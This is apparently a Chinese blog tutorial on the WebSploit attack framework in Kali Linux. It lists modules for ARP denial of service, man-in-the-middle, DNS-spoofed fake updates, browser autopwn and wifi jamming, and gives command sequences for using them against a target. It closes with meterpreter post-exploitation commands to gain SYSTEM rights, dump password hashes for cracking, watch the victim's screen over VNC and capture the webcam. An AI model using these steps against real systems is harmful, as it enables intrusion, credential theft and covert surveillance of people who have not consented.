kali自动化渗透神器websploit模块介绍

websploit

安装websploit

root@kali2:~# apt-get install websploit


root@kali2:~# websploit


db   d8b   db d88888b d8888b. .d8888. d8888b. db       .d88b.  d888888b d888888b 
88   I8I   88 88'     88  `8D 88'  YP 88  `8D 88      .8P  Y8.   `88'   `~~88~~' 
88   I8I   88 88ooooo 88oooY' `8bo.   88oodD' 88      88    88    88       88    
Y8   I8I   88 88~~~~~ 88~~~b.   `Y8b. 88~~~   88      88    88    88       88    
`8b d8'8b d8' 88.     88   8D db   8D 88      88booo. `8b  d8'   .88.      88    
 `8b8' `8d8'  Y88888P Y8888P' `8888Y' 88      Y88888P  `Y88P'  Y888888P    YP    


		--=[WebSploit Advanced MITM Framework
	+---**---==[Version :3.0.0
	+---**---==[Codename :Katana
	+---**---==[Available Modules : 20
		--=[Update Date : [r3.0.0-000 20.9.2014]


wsf > help
Commands		Description
---------------		----------------
set 			Set Value Of Options To Modules
scan			Scan Wifi (Wireless Modules)
stop			Stop Attack & Scan (Wireless Modules)
run 			Execute Module
use 			Select Module For Use
os 			Run Linux Commands(ex : os ifconfig)
back			Exit Current Module
show modules		Show Modules of Current Database
show options		Show Current Options Of Selected Module
upgrade			Get New Version
update			Update Websploit Framework 
about			About US

os clear  //清空屏幕
wsf > show modules
Web Modules			Description
-------------------		---------------------
web/apache_users		Scan Directory Of Apache Users
web/dir_scanner			Directory Scanner
web/wmap			Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma				PHPMyAdmin Login Page Scanner
web/cloudflare_resolver		CloudFlare Resolver




Network Modules			Description
-------------------		---------------------
network/arp_dos			ARP Cache Denial Of Service Attack
network/mfod			Middle Finger Of Doom Attack
network/mitm			Man In The Middle Attack
network/mlitm			Man Left In The Middle Attack
network/webkiller		TCP Kill Attack
network/fakeupdate		Fake Update Attack Using DNS Spoof
network/arp_poisoner		Arp Poisoner




Exploit Modules			Description
-------------------		---------------------
exploit/autopwn			Metasploit Autopwn Service
exploit/browser_autopwn		Metasploit Browser Autopwn Service
exploit/java_applet		Java Applet Attack (Using HTML)




Wireless / Bluetooth Modules	Description
-------------------		---------------------
wifi/wifi_jammer		Wifi Jammer
wifi/wifi_dos			Wifi Dos Attack
wifi/wifi_honeypot		Wireless Honeypot(Fake AP)
wifi/mass_deauth		Mass Deauthentication Attack
bluetooth/bluetooth_pod		Bluetooth Ping Of Death Attack


- ------------------------------------------------------------------------------------
web/pma 模块  //测试网址路径
use web/pma
show opions
set target 测试网址
run
***********
开始启动对应配置和模块
检测phpmyadmin的路径
***********
- ------------------------------------------------------------------------------------
exploit/java applet 模块  //java小程序攻击,感觉和beef有点像
show options
set lhost 自己的ip
set interface wlan0
run


目标打开网址后,则可以监听
show sessions   查看链接的ip
sessions -i 1    选择第一个session
进入meterpreter的交互界面
相当于进入服务器了,可以任意提权
执行shell命令 
- ---------------------------------------------------------------------------------------
use network/mitm   //中间人攻击模块,特点:自动化   欺骗 嗅探
set router  你的网关
set target  目标ip地址
run
- ------------------------------------------------------------------------------------
exploit/browser_autopwn   模块
set ubterface wlan0
set interface wlan0

set lhost 本地ip



getsystem                                      #获取sytem权限
hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解
run vnc                                           #远程连接,监控屏幕
run webcam -p /var/www/          #监控摄像头
background                                   #不退出此meterpreter并返回msf



你可能感兴趣的:(工具使用)